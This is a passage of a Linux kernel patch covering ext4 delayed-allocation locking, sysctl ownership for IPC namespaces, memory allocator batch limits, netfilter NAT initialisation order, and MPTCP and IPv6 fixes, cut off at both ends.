++				 struct ext4_map_blocks *map)
++{
++	unsigned int status;
++	int retval;
++
++	if (ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS))
++		retval = ext4_ext_map_blocks(handle, inode, map, 0);
++	else
++		retval = ext4_ind_map_blocks(handle, inode, map, 0);
++
++	if (retval <= 0)
++		return retval;
++
++	if (unlikely(retval != map->m_len)) {
++		ext4_warning(inode->i_sb,
++			     "ES len assertion failed for inode "
++			     "%lu: retval %d != map->m_len %d",
++			     inode->i_ino, retval, map->m_len);
++		WARN_ON(1);
++	}
++
++	status = map->m_flags & EXT4_MAP_UNWRITTEN ?
++			EXTENT_STATUS_UNWRITTEN : EXTENT_STATUS_WRITTEN;
++	ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
++			      map->m_pblk, status);
++	return retval;
++}
++
+ /*
+  * The ext4_map_blocks() function tries to look up the requested blocks,
+  * and returns if the blocks are already mapped.
+@@ -595,10 +624,8 @@ int ext4_map_blocks(handle_t *handle, struct inode *inode,
+ 		    ext4_es_scan_range(inode, &ext4_es_is_delayed, map->m_lblk,
+ 				       map->m_lblk + map->m_len - 1))
+ 			status |= EXTENT_STATUS_DELAYED;
+-		ret = ext4_es_insert_extent(inode, map->m_lblk,
+-					    map->m_len, map->m_pblk, status);
+-		if (ret < 0)
+-			retval = ret;
++		ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
++				      map->m_pblk, status);
+ 	}
+ 	up_read((&EXT4_I(inode)->i_data_sem));
+ 
+@@ -707,12 +734,8 @@ int ext4_map_blocks(handle_t *handle, struct inode *inode,
+ 		    ext4_es_scan_range(inode, &ext4_es_is_delayed, map->m_lblk,
+ 				       map->m_lblk + map->m_len - 1))
+ 			status |= EXTENT_STATUS_DELAYED;
+-		ret = ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
+-					    map->m_pblk, status);
+-		if (ret < 0) {
+-			retval = ret;
+-			goto out_sem;
+-		}
++		ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
++				      map->m_pblk, status);
+ 	}
+ 
+ out_sem:
+@@ -1746,12 +1769,10 @@ static int ext4_da_map_blocks(struct inode *inode, sector_t iblock,
+ 
+ 	/* Lookup extent status tree firstly */
+ 	if (ext4_es_lookup_extent(inode, iblock, NULL, &es)) {
+-		if (ext4_es_is_hole(&es)) {
+-			retval = 0;
+-			down_read(&EXT4_I(inode)->i_data_sem);
++		if (ext4_es_is_hole(&es))
+ 			goto add_delayed;
+-		}
+ 
++found:
+ 		/*
+ 		 * Delayed extent could be allocated by fallocate.
+ 		 * So we need to check it.
+@@ -1788,52 +1809,42 @@ static int ext4_da_map_blocks(struct inode *inode, sector_t iblock,
+ 	down_read(&EXT4_I(inode)->i_data_sem);
+ 	if (ext4_has_inline_data(inode))
+ 		retval = 0;
+-	else if (ext4_test_inode_flag(inode, EXT4_INODE_EXTENTS))
+-		retval = ext4_ext_map_blocks(NULL, inode, map, 0);
+ 	else
+-		retval = ext4_ind_map_blocks(NULL, inode, map, 0);
++		retval = ext4_map_query_blocks(NULL, inode, map);
++	up_read(&EXT4_I(inode)->i_data_sem);
++	if (retval)
++		return retval;
+ 
+ add_delayed:
+-	if (retval == 0) {
+-		int ret;
+-
+-		/*
+-		 * XXX: __block_prepare_write() unmaps passed block,
+-		 * is it OK?
+-		 */
+-
+-		ret = ext4_insert_delayed_block(inode, map->m_lblk);
+-		if (ret != 0) {
+-			retval = ret;
+-			goto out_unlock;
++	down_write(&EXT4_I(inode)->i_data_sem);
++	/*
++	 * Page fault path (ext4_page_mkwrite does not take i_rwsem)
++	 * and fallocate path (no folio lock) can race. Make sure we
++	 * lookup the extent status tree here again while i_data_sem
++	 * is held in write mode, before inserting a new da entry in
++	 * the extent status tree.
++	 */
++	if (ext4_es_lookup_extent(inode, iblock, NULL, &es)) {
++		if (!ext4_es_is_hole(&es)) {
++			up_write(&EXT4_I(inode)->i_data_sem);
++			goto found;
+ 		}
+-
+-		map_bh(bh, inode->i_sb, invalid_block);
+-		set_buffer_new(bh);
+-		set_buffer_delay(bh);
+-	} else if (retval > 0) {
+-		int ret;
+-		unsigned int status;
+-
+-		if (unlikely(retval != map->m_len)) {
+-			ext4_warning(inode->i_sb,
+-				     "ES len assertion failed for inode "
+-				     "%lu: retval %d != map->m_len %d",
+-				     inode->i_ino, retval, map->m_len);
+-			WARN_ON(1);
++	} else if (!ext4_has_inline_data(inode)) {
++		retval = ext4_map_query_blocks(NULL, inode, map);
++		if (retval) {
++			up_write(&EXT4_I(inode)->i_data_sem);
++			return retval;
+ 		}
+-
+-		status = map->m_flags & EXT4_MAP_UNWRITTEN ?
+-				EXTENT_STATUS_UNWRITTEN : EXTENT_STATUS_WRITTEN;
+-		ret = ext4_es_insert_extent(inode, map->m_lblk, map->m_len,
+-					    map->m_pblk, status);
+-		if (ret != 0)
+-			retval = ret;
+ 	}
+ 
+-out_unlock:
+-	up_read((&EXT4_I(inode)->i_data_sem));
++	retval = ext4_insert_delayed_block(inode, map->m_lblk);
++	up_write(&EXT4_I(inode)->i_data_sem);
++	if (retval)
++		return retval;
+ 
++	map_bh(bh, inode->i_sb, invalid_block);
++	set_buffer_new(bh);
++	set_buffer_delay(bh);
+ 	return retval;
+ }
+ 
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index e19b569d938d8..1264a350d4d75 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -3185,7 +3185,9 @@ static int __get_segment_type_6(struct f2fs_io_info *fio)
+ 		if (page_private_gcing(fio->page)) {
+ 			if (fio->sbi->am.atgc_enabled &&
+ 				(fio->io_type == FS_DATA_IO) &&
+-				(fio->sbi->gc_mode != GC_URGENT_HIGH))
++				(fio->sbi->gc_mode != GC_URGENT_HIGH) &&
++				__is_valid_data_blkaddr(fio->old_blkaddr) &&
++				!is_inode_flag_set(inode, FI_OPU_WRITE))
+ 				return CURSEG_ALL_DATA_ATGC;
+ 			else
+ 				return CURSEG_COLD_DATA;
+diff --git a/fs/file.c b/fs/file.c
+index 69386c2e37c50..82c5d23820820 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -1122,6 +1122,7 @@ __releases(&files->file_lock)
+ 	 * tables and this condition does not arise without those.
+ 	 */
+ 	fdt = files_fdtable(files);
++	fd = array_index_nospec(fd, fdt->max_fds);
+ 	tofree = fdt->fd[fd];
+ 	if (!tofree && fd_is_open(fd, fdt))
+ 		goto Ebusy;
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 4a4c04a3b1a0a..df77a7bcce498 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -483,12 +483,10 @@ static struct inode *proc_sys_make_inode(struct super_block *sb,
+ 			make_empty_dir_inode(inode);
+ 	}
+ 
++	inode->i_uid = GLOBAL_ROOT_UID;
++	inode->i_gid = GLOBAL_ROOT_GID;
+ 	if (root->set_ownership)
+-		root->set_ownership(head, table, &inode->i_uid, &inode->i_gid);
+-	else {
+-		inode->i_uid = GLOBAL_ROOT_UID;
+-		inode->i_gid = GLOBAL_ROOT_GID;
+-	}
++		root->set_ownership(head, &inode->i_uid, &inode->i_gid);
+ 
+ 	return inode;
+ }
+diff --git a/include/linux/leds.h b/include/linux/leds.h
+index ba4861ec73d30..79ab2dfd3c72f 100644
+--- a/include/linux/leds.h
++++ b/include/linux/leds.h
+@@ -356,6 +356,9 @@ struct led_trigger {
+ 	int		(*activate)(struct led_classdev *led_cdev);
+ 	void		(*deactivate)(struct led_classdev *led_cdev);
+ 
++	/* Brightness set by led_trigger_event */
++	enum led_brightness brightness;
++
+ 	/* LED-private triggers have this set */
+ 	struct led_hw_trigger_type *trigger_type;
+ 
+@@ -409,22 +412,11 @@ static inline void *led_get_trigger_data(struct led_classdev *led_cdev)
+ 	return led_cdev->trigger_data;
+ }
+ 
+-/**
+- * led_trigger_rename_static - rename a trigger
+- * @name: the new trigger name
+- * @trig: the LED trigger to rename
+- *
+- * Change a LED trigger name by copying the string passed in
+- * name into current trigger name, which MUST be large
+- * enough for the new string.
+- *
+- * Note that name must NOT point to the same string used
+- * during LED registration, as that could lead to races.
+- *
+- * This is meant to be used on triggers with statically
+- * allocated name.
+- */
+-void led_trigger_rename_static(const char *name, struct led_trigger *trig);
++static inline enum led_brightness
++led_trigger_get_brightness(const struct led_trigger *trigger)
++{
++	return trigger ? trigger->brightness : LED_OFF;
++}
+ 
+ #define module_led_trigger(__led_trigger) \
+ 	module_driver(__led_trigger, led_trigger_register, \
+@@ -462,6 +454,12 @@ static inline void *led_get_trigger_data(struct led_classdev *led_cdev)
+ 	return NULL;
+ }
+ 
++static inline enum led_brightness
++led_trigger_get_brightness(const struct led_trigger *trigger)
++{
++	return LED_OFF;
++}
++
+ #endif /* CONFIG_LEDS_TRIGGERS */
+ 
+ /* Trigger specific functions */
+diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
+index a207c7ed41bd2..9f24feb94b24d 100644
+--- a/include/linux/sysctl.h
++++ b/include/linux/sysctl.h
+@@ -185,7 +185,6 @@ struct ctl_table_root {
+ 	struct ctl_table_set default_set;
+ 	struct ctl_table_set *(*lookup)(struct ctl_table_root *root);
+ 	void (*set_ownership)(struct ctl_table_header *head,
+-			      struct ctl_table *table,
+ 			      kuid_t *uid, kgid_t *gid);
+ 	int (*permissions)(struct ctl_table_header *head, struct ctl_table *table);
+ };
+diff --git a/include/trace/events/btrfs.h b/include/trace/events/btrfs.h
+index 5e10b5b1d16c0..7a6c5a870d33c 100644
+--- a/include/trace/events/btrfs.h
++++ b/include/trace/events/btrfs.h
+@@ -2322,6 +2322,14 @@ DEFINE_EVENT(btrfs__space_info_update, update_bytes_pinned,
+ 	TP_ARGS(fs_info, sinfo, old, diff)
+ );
+ 
++DEFINE_EVENT(btrfs__space_info_update, update_bytes_zone_unusable,
++
++	TP_PROTO(const struct btrfs_fs_info *fs_info,
++		 const struct btrfs_space_info *sinfo, u64 old, s64 diff),
++
++	TP_ARGS(fs_info, sinfo, old, diff)
++);
++
+ DECLARE_EVENT_CLASS(btrfs_raid56_bio,
+ 
+ 	TP_PROTO(const struct btrfs_raid_bio *rbio,
+diff --git a/include/trace/events/mptcp.h b/include/trace/events/mptcp.h
+index 563e48617374d..54e8fb5a229cd 100644
+--- a/include/trace/events/mptcp.h
++++ b/include/trace/events/mptcp.h
+@@ -34,7 +34,7 @@ TRACE_EVENT(mptcp_subflow_get_send,
+ 		struct sock *ssk;
+ 
+ 		__entry->active = mptcp_subflow_active(subflow);
+-		__entry->backup = subflow->backup;
++		__entry->backup = subflow->backup || subflow->request_bkup;
+ 
+ 		if (subflow->tcp_sock && sk_fullsock(subflow->tcp_sock))
+ 			__entry->free = sk_stream_memory_free(subflow->tcp_sock);
+diff --git a/init/Kconfig b/init/Kconfig
+index 537f01eba2e6f..4cd3fc82b09e5 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1924,6 +1924,7 @@ config RUST
+ 	depends on !MODVERSIONS
+ 	depends on !GCC_PLUGINS
+ 	depends on !RANDSTRUCT
++	depends on !SHADOW_CALL_STACK
+ 	depends on !DEBUG_INFO_BTF || PAHOLE_HAS_LANG_EXCLUDE
+ 	help
+ 	  Enables Rust support in the kernel.
+diff --git a/ipc/ipc_sysctl.c b/ipc/ipc_sysctl.c
+index ef313ecfb53a1..d7ca2bdae9e82 100644
+--- a/ipc/ipc_sysctl.c
++++ b/ipc/ipc_sysctl.c
+@@ -14,6 +14,7 @@
+ #include <linux/ipc_namespace.h>
+ #include <linux/msg.h>
+ #include <linux/slab.h>
++#include <linux/cred.h>
+ #include "util.h"
+ 
+ static int proc_ipc_dointvec_minmax_orphans(struct ctl_table *table, int write,
+@@ -190,25 +191,56 @@ static int set_is_seen(struct ctl_table_set *set)
+ 	return &current->nsproxy->ipc_ns->ipc_set == set;
+ }
+ 
++static void ipc_set_ownership(struct ctl_table_header *head,
++			      kuid_t *uid, kgid_t *gid)
++{
++	struct ipc_namespace *ns =
++		container_of(head->set, struct ipc_namespace, ipc_set);
++
++	kuid_t ns_root_uid = make_kuid(ns->user_ns, 0);
++	kgid_t ns_root_gid = make_kgid(ns->user_ns, 0);
++
++	*uid = uid_valid(ns_root_uid) ? ns_root_uid : GLOBAL_ROOT_UID;
++	*gid = gid_valid(ns_root_gid) ? ns_root_gid : GLOBAL_ROOT_GID;
++}
++
+ static int ipc_permissions(struct ctl_table_header *head, struct ctl_table *table)
+ {
+ 	int mode = table->mode;
+ 
+ #ifdef CONFIG_CHECKPOINT_RESTORE
+-	struct ipc_namespace *ns = current->nsproxy->ipc_ns;
++	struct ipc_namespace *ns =
++		container_of(head->set, struct ipc_namespace, ipc_set);
+ 
+ 	if (((table->data == &ns->ids[IPC_SEM_IDS].next_id) ||
+ 	     (table->data == &ns->ids[IPC_MSG_IDS].next_id) ||
+ 	     (table->data == &ns->ids[IPC_SHM_IDS].next_id)) &&
+ 	    checkpoint_restore_ns_capable(ns->user_ns))
+ 		mode = 0666;
++	else
+ #endif
+-	return mode;
++	{
++		kuid_t ns_root_uid;
++		kgid_t ns_root_gid;
++
++		ipc_set_ownership(head, &ns_root_uid, &ns_root_gid);
++
++		if (uid_eq(current_euid(), ns_root_uid))
++			mode >>= 6;
++
++		else if (in_egroup_p(ns_root_gid))
++			mode >>= 3;
++	}
++
++	mode &= 7;
++
++	return (mode << 6) | (mode << 3) | mode;
+ }
+ 
+ static struct ctl_table_root set_root = {
+ 	.lookup = set_lookup,
+ 	.permissions = ipc_permissions,
++	.set_ownership = ipc_set_ownership,
+ };
+ 
+ bool setup_ipc_sysctls(struct ipc_namespace *ns)
+diff --git a/ipc/mq_sysctl.c b/ipc/mq_sysctl.c
+index fbf6a8b93a265..c960691fc24d9 100644
+--- a/ipc/mq_sysctl.c
++++ b/ipc/mq_sysctl.c
+@@ -12,6 +12,7 @@
+ #include <linux/stat.h>
+ #include <linux/capability.h>
+ #include <linux/slab.h>
++#include <linux/cred.h>
+ 
+ static int msg_max_limit_min = MIN_MSGMAX;
+ static int msg_max_limit_max = HARD_MSGMAX;
+@@ -76,8 +77,42 @@ static int set_is_seen(struct ctl_table_set *set)
+ 	return &current->nsproxy->ipc_ns->mq_set == set;
+ }
+ 
++static void mq_set_ownership(struct ctl_table_header *head,
++			     kuid_t *uid, kgid_t *gid)
++{
++	struct ipc_namespace *ns =
++		container_of(head->set, struct ipc_namespace, mq_set);
++
++	kuid_t ns_root_uid = make_kuid(ns->user_ns, 0);
++	kgid_t ns_root_gid = make_kgid(ns->user_ns, 0);
++
++	*uid = uid_valid(ns_root_uid) ? ns_root_uid : GLOBAL_ROOT_UID;
++	*gid = gid_valid(ns_root_gid) ? ns_root_gid : GLOBAL_ROOT_GID;
++}
++
++static int mq_permissions(struct ctl_table_header *head, struct ctl_table *table)
++{
++	int mode = table->mode;
++	kuid_t ns_root_uid;
++	kgid_t ns_root_gid;
++
++	mq_set_ownership(head, &ns_root_uid, &ns_root_gid);
++
++	if (uid_eq(current_euid(), ns_root_uid))
++		mode >>= 6;
++
++	else if (in_egroup_p(ns_root_gid))
++		mode >>= 3;
++
++	mode &= 7;
++
++	return (mode << 6) | (mode << 3) | mode;
++}
++
+ static struct ctl_table_root set_root = {
+ 	.lookup = set_lookup,
++	.permissions = mq_permissions,
++	.set_ownership = mq_set_ownership,
+ };
+ 
+ bool setup_mq_sysctls(struct ipc_namespace *ns)
+diff --git a/kernel/irq/irqdomain.c b/kernel/irq/irqdomain.c
+index 607c0c3d3f5e1..6aea9d25ab9ac 100644
+--- a/kernel/irq/irqdomain.c
++++ b/kernel/irq/irqdomain.c
+@@ -154,7 +154,6 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 		switch (fwid->type) {
+ 		case IRQCHIP_FWNODE_NAMED:
+ 		case IRQCHIP_FWNODE_NAMED_ID:
+-			domain->fwnode = fwnode;
+ 			domain->name = kstrdup(fwid->name, GFP_KERNEL);
+ 			if (!domain->name) {
+ 				kfree(domain);
+@@ -163,7 +162,6 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 			domain->flags |= IRQ_DOMAIN_NAME_ALLOCATED;
+ 			break;
+ 		default:
+-			domain->fwnode = fwnode;
+ 			domain->name = fwid->name;
+ 			break;
+ 		}
+@@ -185,7 +183,6 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 		strreplace(name, '/', ':');
+ 
+ 		domain->name = name;
+-		domain->fwnode = fwnode;
+ 		domain->flags |= IRQ_DOMAIN_NAME_ALLOCATED;
+ 	}
+ 
+@@ -201,8 +198,8 @@ static struct irq_domain *__irq_domain_create(struct fwnode_handle *fwnode,
+ 		domain->flags |= IRQ_DOMAIN_NAME_ALLOCATED;
+ 	}
+ 
+-	fwnode_handle_get(fwnode);
+-	fwnode_dev_initialized(fwnode, true);
++	domain->fwnode = fwnode_handle_get(fwnode);
++	fwnode_dev_initialized(domain->fwnode, true);
+ 
+ 	/* Fill structure */
+ 	INIT_RADIX_TREE(&domain->revmap_tree, GFP_KERNEL);
+diff --git a/mm/Kconfig b/mm/Kconfig
+index 35109a4a2f7ce..a65145fe89f2b 100644
+--- a/mm/Kconfig
++++ b/mm/Kconfig
+@@ -627,6 +627,17 @@ config HUGETLB_PAGE_SIZE_VARIABLE
+ config CONTIG_ALLOC
+ 	def_bool (MEMORY_ISOLATION && COMPACTION) || CMA
+ 
++config PCP_BATCH_SCALE_MAX
++	int "Maximum scale factor of PCP (Per-CPU pageset) batch allocate/free"
++	default 5
++	range 0 6
++	help
++	  In page allocator, PCP (Per-CPU pageset) is refilled and drained in
++	  batches.  The batch number is scaled automatically to improve page
++	  allocation/free throughput.  But too large scale factor may hurt
++	  latency.  This option sets the upper limit of scale factor to limit
++	  the maximum latency.
++
+ config PHYS_ADDR_T_64BIT
+ 	def_bool 64BIT
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 12412263d131e..a905b850d31c4 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -3176,14 +3176,21 @@ void drain_zone_pages(struct zone *zone, struct per_cpu_pages *pcp)
+  */
+ static void drain_pages_zone(unsigned int cpu, struct zone *zone)
+ {
+-	struct per_cpu_pages *pcp;
++	struct per_cpu_pages *pcp = per_cpu_ptr(zone->per_cpu_pageset, cpu);
++	int count;
+ 
+-	pcp = per_cpu_ptr(zone->per_cpu_pageset, cpu);
+-	if (pcp->count) {
++	do {
+ 		spin_lock(&pcp->lock);
+-		free_pcppages_bulk(zone, pcp->count, pcp, 0);
++		count = pcp->count;
++		if (count) {
++			int to_drain = min(count,
++				pcp->batch << CONFIG_PCP_BATCH_SCALE_MAX);
++
++			free_pcppages_bulk(zone, to_drain, pcp, 0);
++			count -= to_drain;
++		}
+ 		spin_unlock(&pcp->lock);
+-	}
++	} while (count);
+ }
+ 
+ /*
+@@ -3389,7 +3396,7 @@ static int nr_pcp_free(struct per_cpu_pages *pcp, int high, int batch,
+ 	 * freeing of pages without any allocation.
+ 	 */
+ 	batch <<= pcp->free_factor;
+-	if (batch < max_nr_free)
++	if (batch < max_nr_free && pcp->free_factor < CONFIG_PCP_BATCH_SCALE_MAX)
+ 		pcp->free_factor++;
+ 	batch = clamp(batch, min_nr_free, max_nr_free);
+ 
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 57302021b7ebb..320fc1e6dff2a 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2837,6 +2837,27 @@ static int hci_passive_scan_sync(struct hci_dev *hdev)
+ 	 */
+ 	filter_policy = hci_update_accept_list_sync(hdev);
+ 
++	/* If suspended and filter_policy set to 0x00 (no acceptlist) then
++	 * passive scanning cannot be started since that would require the host
++	 * to be woken up to process the reports.
++	 */
++	if (hdev->suspended && !filter_policy) {
++		/* Check if accept list is empty then there is no need to scan
++		 * while suspended.
++		 */
++		if (list_empty(&hdev->le_accept_list))
++			return 0;
++
++		/* If there are devices is the accept_list that means some
++		 * devices could not be programmed which in non-suspended case
++		 * means filter_policy needs to be set to 0x00 so the host needs
++		 * to filter, but since this is treating suspended case we
++		 * can ignore device needing host to filter to allow devices in
++		 * the acceptlist to be able to wakeup the system.
++		 */
++		filter_policy = 0x01;
++	}
++
+ 	/* When the controller is using random resolvable addresses and
+ 	 * with that having LE privacy enabled, then controllers with
+ 	 * Extended Scanner Filter Policies support can now enable support
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 1163226c025c1..be663a7382ce9 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -3178,7 +3178,7 @@ static int rtnl_dellink(struct sk_buff *skb, struct nlmsghdr *nlh,
+ 	if (ifm->ifi_index > 0)
+ 		dev = __dev_get_by_index(tgt_net, ifm->ifi_index);
+ 	else if (tb[IFLA_IFNAME] || tb[IFLA_ALT_IFNAME])
+-		dev = rtnl_dev_get(net, tb);
++		dev = rtnl_dev_get(tgt_net, tb);
+ 	else if (tb[IFLA_GROUP])
+ 		err = rtnl_group_dellink(tgt_net, nla_get_u32(tb[IFLA_GROUP]));
+ 	else
+diff --git a/net/ipv4/netfilter/iptable_nat.c b/net/ipv4/netfilter/iptable_nat.c
+index 56f6ecc43451e..12ca666d6e2c1 100644
+--- a/net/ipv4/netfilter/iptable_nat.c
++++ b/net/ipv4/netfilter/iptable_nat.c
+@@ -145,25 +145,27 @@ static struct pernet_operations iptable_nat_net_ops = {
+ 
+ static int __init iptable_nat_init(void)
+ {
+-	int ret = xt_register_template(&nf_nat_ipv4_table,
+-				       iptable_nat_table_init);
++	int ret;
+ 
++	/* net->gen->ptr[iptable_nat_net_id] must be allocated
++	 * before calling iptable_nat_table_init().
++	 */
++	ret = register_pernet_subsys(&iptable_nat_net_ops);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = register_pernet_subsys(&iptable_nat_net_ops);
+-	if (ret < 0) {
+-		xt_unregister_template(&nf_nat_ipv4_table);
+-		return ret;
+-	}
++	ret = xt_register_template(&nf_nat_ipv4_table,
++				   iptable_nat_table_init);
++	if (ret < 0)
++		unregister_pernet_subsys(&iptable_nat_net_ops);
+ 
+ 	return ret;
+ }
+ 
+ static void __exit iptable_nat_exit(void)
+ {
+-	unregister_pernet_subsys(&iptable_nat_net_ops);
+ 	xt_unregister_template(&nf_nat_ipv4_table);
++	unregister_pernet_subsys(&iptable_nat_net_ops);
+ }
+ 
+ module_init(iptable_nat_init);
+diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
+index 8c5a99fe68030..cfb4cf6e66549 100644
+--- a/net/ipv6/ndisc.c
++++ b/net/ipv6/ndisc.c
+@@ -227,6 +227,7 @@ struct ndisc_options *ndisc_parse_options(const struct net_device *dev,
+ 		return NULL;
+ 	memset(ndopts, 0, sizeof(*ndopts));
+ 	while (opt_len) {
++		bool unknown = false;
+ 		int l;
+ 		if (opt_len < sizeof(struct nd_opt_hdr))
+ 			return NULL;
+@@ -262,22 +263,23 @@ struct ndisc_options *ndisc_parse_options(const struct net_device *dev,
+ 			break;
+ #endif
+ 		default:
+-			if (ndisc_is_useropt(dev, nd_opt)) {
+-				ndopts->nd_useropts_end = nd_opt;
+-				if (!ndopts->nd_useropts)
+-					ndopts->nd_useropts = nd_opt;
+-			} else {
+-				/*
+-				 * Unknown options must be silently ignored,
+-				 * to accommodate future extension to the
+-				 * protocol.
+-				 */
+-				ND_PRINTK(2, notice,
+-					  "%s: ignored unsupported option; type=%d, len=%d\n",
+-					  __func__,
+-					  nd_opt->nd_opt_type,
+-					  nd_opt->nd_opt_len);
+-			}
++			unknown = true;
++		}
++		if (ndisc_is_useropt(dev, nd_opt)) {
++			ndopts->nd_useropts_end = nd_opt;
++			if (!ndopts->nd_useropts)
++				ndopts->nd_useropts = nd_opt;
++		} else if (unknown) {
++			/*
++			 * Unknown options must be silently ignored,
++			 * to accommodate future extension to the
++			 * protocol.
++			 */
++			ND_PRINTK(2, notice,
++				  "%s: ignored unsupported option; type=%d, len=%d\n",
++				  __func__,
++				  nd_opt->nd_opt_type,
++				  nd_opt->nd_opt_len);
+ 		}
+ next_opt:
+ 		opt_len -= l;
+diff --git a/net/ipv6/netfilter/ip6table_nat.c b/net/ipv6/netfilter/ip6table_nat.c
+index bf3cb3a13600c..52d597b16b658 100644
+--- a/net/ipv6/netfilter/ip6table_nat.c
++++ b/net/ipv6/netfilter/ip6table_nat.c
+@@ -147,23 +147,27 @@ static struct pernet_operations ip6table_nat_net_ops = {
+ 
+ static int __init ip6table_nat_init(void)
+ {
+-	int ret = xt_register_template(&nf_nat_ipv6_table,
+-				       ip6table_nat_table_init);
++	int ret;
+ 
++	/* net->gen->ptr[ip6table_nat_net_id] must be allocated
++	 * before calling ip6t_nat_register_lookups().
++	 */
++	ret = register_pernet_subsys(&ip6table_nat_net_ops);
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = register_pernet_subsys(&ip6table_nat_net_ops);
++	ret = xt_register_template(&nf_nat_ipv6_table,
++				   ip6table_nat_table_init);
+ 	if (ret)
+-		xt_unregister_template(&nf_nat_ipv6_table);
++		unregister_pernet_subsys(&ip6table_nat_net_ops);
+ 
+ 	return ret;
+ }
+ 
+ static void __exit ip6table_nat_exit(void)
+ {
+-	unregister_pernet_subsys(&ip6table_nat_net_ops);
+ 	xt_unregister_template(&nf_nat_ipv6_table);
++	unregister_pernet_subsys(&ip6table_nat_net_ops);
+ }
+ 
+ module_init(ip6table_nat_init);
+diff --git a/net/iucv/af_iucv.c b/net/iucv/af_iucv.c
+index 498a0c35b7bb2..815b1df0b2d19 100644
+--- a/net/iucv/af_iucv.c
++++ b/net/iucv/af_iucv.c
+@@ -335,8 +335,8 @@ static void iucv_sever_path(struct sock *sk, int with_user_data)
+ 	struct iucv_sock *iucv = iucv_sk(sk);
+ 	struct iucv_path *path = iucv->path;
+ 
+-	if (iucv->path) {
+-		iucv->path = NULL;
++	/* Whoever resets the path pointer, must sever and free it. */
++	if (xchg(&iucv->path, NULL)) {
+ 		if (with_user_data) {
+ 			low_nmcpy(user_data, iucv->src_name);
+ 			high_nmcpy(user_data, iucv->dst_name);
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index a718ebcb5bc63..daf53d685b5f3 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -904,7 +904,7 @@ bool mptcp_synack_options(const struct request_sock *req, unsigned int *size,
+ 		return true;
+ 	} else if (subflow_req->mp_join) {
+ 		opts->suboptions = OPTION_MPTCP_MPJ_SYNACK;
+-		opts->backup = subflow_req->backup;
++		opts->backup = subflow_req->request_bkup;
+ 		opts->join_id = subflow_req->local_id;
+ 		opts->thmac = subflow_req->thmac;
+ 		opts->nonce = subflow_req->local_nonce;
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 3e2cbf0e6ce99..e9dff63825817 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -481,7 +481,6 @@ static void __mptcp_pm_send_ack(struct mptcp_sock *msk, struct mptcp_subflow_con
+ 			msk->last_snd = NULL;
+ 
+ 		subflow->send_mp_prio = 1;
+-		subflow->backup = backup;
+ 		subflow->request_bkup = backup;
+ 	}
+ 
+@@ -1445,6 +1444,7 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	ret = remove_anno_list_by_saddr(msk, addr);
+ 	if (ret || force) {
+ 		spin_lock_bh(&msk->pm.lock);
++		msk->pm.add_addr_signaled -= ret;
+ 		mptcp_pm_remove_addr(msk, &list);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+@@ -1578,16 +1578,25 @@ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list)
+ {
+ 	struct mptcp_rm_list alist = { .nr = 0 };
+ 	struct mptcp_pm_addr_entry *entry;
++	int anno_nr = 0;
+ 
+ 	list_for_each_entry(entry, rm_list, list) {
+-		if ((remove_anno_list_by_saddr(msk, &entry->addr) ||
+-		     lookup_subflow_by_saddr(&msk->conn_list, &entry->addr)) &&
+-		    alist.nr < MPTCP_RM_IDS_MAX)
+-			alist.ids[alist.nr++] = entry->addr.id;
++		if (alist.nr >= MPTCP_RM_IDS_MAX)
++			break;
++
++		/* only delete if either announced or matching a subflow */
++		if (remove_anno_list_by_saddr(msk, &entry->addr))
++			anno_nr++;
++		else if (!lookup_subflow_by_saddr(&msk->conn_list,
++						  &entry->addr))
++			continue;
++
++		alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
+ 	if (alist.nr) {
+ 		spin_lock_bh(&msk->pm.lock);
++		msk->pm.add_addr_signaled -= anno_nr;
+ 		mptcp_pm_remove_addr(msk, &alist);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+@@ -1600,17 +1609,18 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 	struct mptcp_pm_addr_entry *entry;
+ 
+ 	list_for_each_entry(entry, rm_list, list) {
+-		if (lookup_subflow_by_saddr(&msk->conn_list, &entry->addr) &&
+-		    slist.nr < MPTCP_RM_IDS_MAX)
++		if (slist.nr < MPTCP_RM_IDS_MAX &&
++		    lookup_subflow_by_saddr(&msk->conn_list, &entry->addr))
+ 			slist.ids[slist.nr++] = entry->addr.id;
+ 
+-		if (remove_anno_list_by_saddr(msk, &entry->addr) &&
+-		    alist.nr < MPTCP_RM_IDS_MAX)
++		if (alist.nr < MPTCP_RM_IDS_MAX &&
++		    remove_anno_list_by_saddr(msk, &entry->addr))
